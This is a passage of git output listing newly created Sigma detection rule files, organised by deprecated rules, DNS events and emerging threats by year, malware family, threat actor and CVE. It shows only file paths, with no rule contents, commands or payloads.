tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_lolbin_findstr.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_lolbin_office.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_lolbin_rdrleakdiag.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_lolbins_by_office_applications.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_mal_ryuk.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_malware_trickbot_recon_activity.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_mavinject_proc_inj.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_msdt_diagcab.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_new_service_creation.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_nslookup_pwsh_download_cradle.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_odbcconf_susp_exec.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_office_from_proxy_executing_regsvr32_payload.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_office_from_proxy_executing_regsvr32_payload2.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_office_spawning_wmi_commandline.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_possible_applocker_bypass.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_powershell_amsi_bypass_pattern_nov22.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_powershell_base64_invoke_susp_cmdlets.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_powershell_base64_listing_shadowcopy.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_powershell_base64_shellcode.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_powershell_bitsjob.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_powershell_service_modification.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_powershell_xor_encoded_command.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_reg_dump_sam.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_regsvr32_anomalies.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_renamed_paexec.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_root_certificate_installed.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_run_from_zip.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_sc_delete_av_services.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_schtasks_user_temp.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_service_stop.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_susp_bitstransfer.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_susp_cmd_exectution_via_wmi.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_susp_commandline_chars.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_susp_lolbin_non_c_drive.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_susp_run_folder.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_susp_squirrel_lolbin.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_sysinternals_psexec_service_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_sysinternals_psexesvc_start.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_whoami_as_system.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_winword_dll_load.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_wmic_execution_via_office_process.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_wmic_remote_command.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_wmic_remote_service.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_wuauclt_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/process_creation_syncappvpublishingserver_exe.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/registry_add_sysinternals_sdelete_registry_keys.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/registry_event_asep_reg_keys_modification.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/registry_set_abusing_windows_telemetry_for_persistence.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/registry_set_add_hidden_user.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/registry_set_disable_microsoft_office_security_features.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/registry_set_office_security.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/registry_set_silentprocessexit.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/sysmon_rclone_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/win_defender_disabled.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/win_dsquery_domain_trust_discovery.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/win_lateral_movement_condrv.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/win_security_event_log_cleared.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/win_security_group_modification_logging.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/win_security_lolbas_execution_of_nltest.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/win_susp_esentutl_activity.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/win_susp_vssadmin_ntds_activity.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/win_system_service_install_susp_double_ampersand.yml create mode 100644 tools/sigmac/converted_rules/builtin/diagnosis/scripted/win_diagnosis_scripted_load_remote_diagcab.yml create mode 100644 tools/sigmac/converted_rules/builtin/dns_client/win_dns_client__mal_cobaltstrike.yml create mode 100644 tools/sigmac/converted_rules/builtin/dns_client/win_dns_client_anonymfiles_com.yml create mode 100644 tools/sigmac/converted_rules/builtin/dns_client/win_dns_client_mega_nz.yml create mode 100644 tools/sigmac/converted_rules/builtin/dns_client/win_dns_client_tor_onion.yml create mode 100644 tools/sigmac/converted_rules/builtin/dns_client/win_dns_client_ufile_io.yml create mode 100644 tools/sigmac/converted_rules/builtin/dns_server/win_dns_server_failed_dns_zone_transfer.yml create mode 100644 tools/sigmac/converted_rules/builtin/dns_server/win_dns_server_susp_server_level_plugin_dll.yml create mode 100644 tools/sigmac/converted_rules/builtin/driverframeworks/win_usb_device_plugged.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2014/TA/Axiom/proc_creation_win_apt_zxshell.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2014/TA/Turla/proc_creation_win_apt_turla_commands_critical.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2014/TA/Turla/proc_creation_win_apt_turla_comrat_may20.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2015/Exploits/CVE-2015-1641/proc_creation_win_exploit_cve_2015_1641.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2017/Exploits/CVE-2017-0261/proc_creation_win_exploit_cve_2017_0261.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2017/Exploits/CVE-2017-11882/proc_creation_win_exploit_cve_2017_11882.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2017/Exploits/CVE-2017-8759/proc_creation_win_exploit_cve_2017_8759.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2017/Malware/Adwind-RAT/proc_creation_win_malware_adwind.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2017/Malware/Fireball/proc_creation_win_malware_fireball.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2017/Malware/NotPetya/proc_creation_win_malware_notpetya.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2017/Malware/PlugX/proc_creation_win_malware_plugx_susp_exe_locations.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2017/Malware/StoneDrill/win_system_apt_stonedrill.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2017/Malware/WannaCry/proc_creation_win_malware_wannacry.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2017/TA/APT10/proc_creation_win_apt_apt10_cloud_hopper.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2017/TA/Dragonfly/proc_creation_win_apt_ta17_293a_ps.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2017/TA/Lazarus/proc_creation_win_apt_lazarus_binary_masquerading.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2017/TA/Turla/win_system_apt_carbonpaper_turla.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2017/TA/Turla/win_system_apt_turla_service_png.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2018/Malware/Elise-Backdoor/proc_creation_win_malware_elise.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2018/TA/APT27/proc_creation_win_apt_apt27_emissary_panda.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2018/TA/APT28/proc_creation_win_apt_sofacy.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2018/TA/APT29-CozyBear/proc_creation_win_apt_apt29_phishing_campaign_indicators.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2018/TA/MuddyWater/proc_creation_win_apt_muddywater_activity.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2018/TA/OilRig/proc_creation_win_apt_oilrig_mar18.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2018/TA/OilRig/win_security_apt_oilrig_mar18.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2018/TA/OilRig/win_system_apt_oilrig_mar18.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2018/TA/Slingshot/proc_creation_win_apt_slingshot.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2018/TA/Slingshot/win_security_apt_slingshot.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2018/TA/TropicTrooper/proc_creation_win_apt_tropictrooper.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2019/Exploits/BearLPE-Exploit/proc_creation_win_exploit_other_bearlpe.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2019/Exploits/CVE-2019-1388/proc_creation_win_exploit_cve_2019_1388.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2019/Malware/BabyShark/proc_creation_win_malware_babyshark.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2019/Malware/Dridex/proc_creation_win_malware_dridex.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2019/Malware/Dtrack-RAT/proc_creation_win_malware_dtrack.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2019/Malware/Emotet/proc_creation_win_malware_emotet.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2019/Malware/Formbook/proc_creation_win_malware_formbook.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2019/Malware/LockerGoga/proc_creation_win_malware_lockergoga_ransomware.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2019/Malware/QBot/proc_creation_win_malware_qbot.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2019/Malware/Ryuk/proc_creation_win_malware_ryuk.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2019/Malware/Snatch/proc_creation_win_malware_snatch_ransomware.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2019/TA/APC-C-12/proc_creation_win_apt_aptc12_bluemushroom.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2019/TA/APT31/proc_creation_win_apt_apt31_judgement_panda.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2019/TA/Bear-APT-Activity/proc_creation_win_apt_bear_activity_gtr19.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2019/TA/EmpireMonkey/proc_creation_win_apt_empiremonkey.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2019/TA/EquationGroup/proc_creation_win_apt_equationgroup_dll_u_load.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2019/TA/MustangPanda/proc_creation_win_apt_mustangpanda.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2019/TA/Operation-Wocao/proc_creation_win_apt_wocao.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2019/TA/Operation-Wocao/win_security_apt_wocao.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2020/Exploits/CVE-2020-0688/win_vul_cve_2020_0688.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2020/Exploits/CVE-2020-10189/proc_creation_win_exploit_cve_2020_10189.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2020/Exploits/CVE-2020-1048/proc_creation_win_exploit_cve_2020_1048.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2020/Exploits/CVE-2020-1350/proc_creation_win_exploit_cve_2020_1350.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2020/Malware/Blue-Mockingbird/proc_creation_win_malware_blue_mockingbird.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2020/Malware/Emotet/proc_creation_win_malware_emotet_rundll32_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2020/Malware/Ke3chang-TidePool/proc_creation_win_malware_ke3chang_tidepool.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2020/Malware/Maze/proc_creation_win_malware_maze_ransomware.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2020/TA/Evilnum/proc_creation_win_apt_evilnum_jul20.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2020/TA/GALLIUM/proc_creation_win_apt_gallium_iocs.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2020/TA/GALLIUM/win_dns_analytic_apt_gallium.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2020/TA/Greenbug/proc_creation_win_apt_greenbug_may20.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2020/TA/Lazarus/proc_creation_win_apt_lazarus_group_activity.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2020/TA/SolarWinds-Supply-Chain/proc_creation_win_apt_unc2452_cmds.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2020/TA/SolarWinds-Supply-Chain/proc_creation_win_apt_unc2452_ps.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2020/TA/SolarWinds-Supply-Chain/proc_creation_win_apt_unc2452_vbscript_pattern.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2020/TA/TAIDOOR-RAT/proc_creation_win_apt_taidoor.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2020/TA/Winnti/proc_creation_win_apt_winnti_mal_hk_jan20.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2020/TA/Winnti/proc_creation_win_apt_winnti_pipemon.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-1675/av_printernightmare_cve_2021_34527.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-1675/win_exploit_cve_2021_1675_printspooler.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-1675/win_exploit_cve_2021_1675_printspooler_operational.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-1675/win_security_exploit_cve_2021_1675_printspooler_security.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-26084/proc_creation_win_exploit_cve_2021_26084_atlassian_confluence.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-26857/proc_creation_win_exploit_cve_2021_26857_msexchange.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-35211/proc_creation_win_exploit_cve_2021_35211_servu.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-40444/proc_creation_win_exploit_cve_2021_40444.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-40444/proc_creation_win_exploit_cve_2021_40444_office_directory_traversal.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-41379/proc_creation_win_exploit_cve_2021_41379.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-41379/win_vul_cve_2021_41379.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-42278/win_system_exploit_cve_2021_42278.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-42287/win_security_samaccountname_spoofing_cve_2021_42287.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/RazerInstaller-LPE-Exploit/proc_creation_win_exploit_other_razorinstaller_lpe.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/SystemNightmare-Exploit/proc_creation_win_exploit_other_systemnightmare.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/registry_set_cve_2021_31979_cve_2021_33771_exploits.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/win_exchange_cve_2021_42321.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/BlackByte/proc_creation_win_malware_blackbyte_ransomware.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti_7zip.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti_ransomware_commands.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti_ransomware_database_dump.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/DarkSide/proc_creation_win_malware_darkside_ransomware.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/Devil-Bait/proc_creation_win_malware_devil_bait_output_redirect.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/Goofy-Guineapig/proc_creation_win_malware_goofy_guineapig_broken_cmd.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/Goofy-Guineapig/proc_creation_win_malware_goofy_guineapig_googleupdate_uncommon_child_instance.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/Goofy-Guineapig/win_system_malware_goofy_guineapig_service_persistence.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/Pingback/proc_creation_win_malware_pingback_backdoor.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/Small-Sieve/proc_creation_win_malware_small_sieve_cli_arg.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/Small-Sieve/registry_set_malware_small_sieve_evasion_typo.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2021/TA/HAFNIUM/proc_creation_win_apt_hafnium.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2021/TA/Kaseya-Supply-Chain/proc_creation_win_apt_revil_kaseya.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2021/TA/SOURGUM/proc_creation_win_apt_sourgrum.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2022/Exploits/CVE-2022-21554/proc_creation_win_exploit_cve_2023_21554_queuejumper.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2022/Exploits/CVE-2022-29072/proc_creation_win_exploit_cve_2022_29072_7zip.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2022/Exploits/CVE-2022-41120/proc_creation_win_exploit_cve_2022_41120_sysmon_eop.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2022/Malware/BlueSky-Ransomware/win_security_malware_bluesky_ransomware_files_indicators.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2022/Malware/Hermetic-Wiper/proc_creation_win_malware_hermetic_wiper_activity.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2022/Malware/Raspberry-Robin/proc_creation_win_malware_raspberry_robin_single_dot_ending_file.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2022/Malware/win_mssql_sp_maggie.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2022/TA/ACTINIUM/proc_creation_win_apt_actinium_persistence.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2022/TA/MERCURY/proc_creation_win_apt_mercury.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/Exploits/CVE-2023-22518/proc_creation_win_exploit_cve_2023_22518_confluence_tomcat_child_proc.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/Exploits/CVE-2023-23397/registry_set_exploit_cve_2023_23397_outlook_reminder_trigger.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/Exploits/CVE-2023-23397/win_security_exploit_cve_2023_23397_outlook_remote_file_query.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/Exploits/CVE-2023-23397/win_smbclient_connectivity_exploit_cve_2023_23397_outlook_remote_file.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/Exploits/CVE-2023-36884/win_security_exploit_cve_2023_36884_office_windows_html_rce_share_access_pattern.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/Exploits/CVE-2023-38831/proc_creation_win_exploit_cve_2023_38831_winrar_child_proc.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/Exploits/CVE-2023-40477/win_application_exploit_cve_2023_40477_winrar_crash.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/Exploits/win_msmq_corrupted_packet.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/COLDSTEEL/proc_creation_win_malware_coldsteel_anonymous_process.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/COLDSTEEL/proc_creation_win_malware_coldsteel_service_persistence.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/COLDSTEEL/registry_set_malware_coldsteel_created_users.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/COLDSTEEL/win_system_malware_coldsteel_persistence_service.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/DarkGate/proc_creation_win_malware_darkgate_autoit3_from_susp_parent_and_location.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/DarkGate/proc_creation_win_malware_darkgate_net_user_creation.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/Griffon/proc_creation_win_malware_griffon_patterns.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/IcedID/proc_creation_win_malware_icedid_rundll32_dllregisterserver.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/Pikabot/proc_creation_win_malware_pikabot_combined_commands_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/Pikabot/proc_creation_win_malware_pikabot_rundll32_discovery.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/Pikabot/proc_creation_win_malware_pikabot_rundll32_hollowing.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_regsvr32_calc_pattern.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_rundll32_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_rundll32_exports.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_rundll32_fake_dll_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_uninstaller_cleanup.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/Rhadamanthys/proc_creation_win_malware_rhadamanthys_stealer_dll_launch.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/Rorschach/proc_creation_win_malware_rorschach_ransomware_activity.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/SNAKE/proc_creation_win_malware_snake_installer_cli_args.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/SNAKE/proc_creation_win_malware_snake_installer_exec.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/SNAKE/proc_creation_win_malware_snake_service_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/SNAKE/registry_event_malware_snake_covert_store_key.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/SNAKE/registry_set_malware_snake_encrypted_key.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/SNAKE/win_system_malware_snake_persistence_service.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/3CX-Supply-Chain/proc_creation_win_malware_3cx_compromise_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/3CX-Supply-Chain/proc_creation_win_malware_3cx_compromise_susp_children.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/3CX-Supply-Chain/proc_creation_win_malware_3cx_compromise_susp_update.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Cozy-Bear/win_security_apt_cozy_bear_scheduled_tasks_name.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Cozy-Bear/win_taskscheduler_apt_cozy_bear_graphical_proton_task_names.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Diamond-Sleet/proc_creation_win_apt_diamond_sleet_indicators.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Diamond-Sleet/registry_event_apt_diamond_sleet_scheduled_task.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Diamond-Sleet/win_security_apt_diamond_sleet_scheduled_task.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/FIN7/posh_ps_apt_fin7_powerhold.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/FIN7/posh_ps_apt_fin7_powertrash_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/FIN7/proc_creation_win_apt_fin7_powertrash_lateral_movement.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Lace-Tempest/posh_ps_apt_lace_tempest_eraser_script.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Lace-Tempest/posh_ps_apt_lace_tempest_malware_launcher.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Lace-Tempest/proc_creation_win_apt_lace_tempest_cobalt_strike_download.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Lace-Tempest/proc_creation_win_apt_lace_tempest_loader_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Mint-Sandstorm/proc_creation_win_apt_mint_sandstorm_aspera_faspex_susp_child_process.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Mint-Sandstorm/proc_creation_win_apt_mint_sandstorm_log4j_wstomcat_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Mint-Sandstorm/proc_creation_win_apt_mint_sandstorm_manage_engine_susp_child_process.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Mustang-Panda-Australia-Campaign/proc_creation_win_apt_mustang_panda_indicators.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/PaperCut-Print-Management-Exploitation/proc_creation_win_papercut_print_management_exploitation_indicators.yml create mode 100644 tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/PaperCut-Print-Management-Exploitation/proc_creation_win_papercut_print_management_exploitation_pc_app.yml create mode 100644 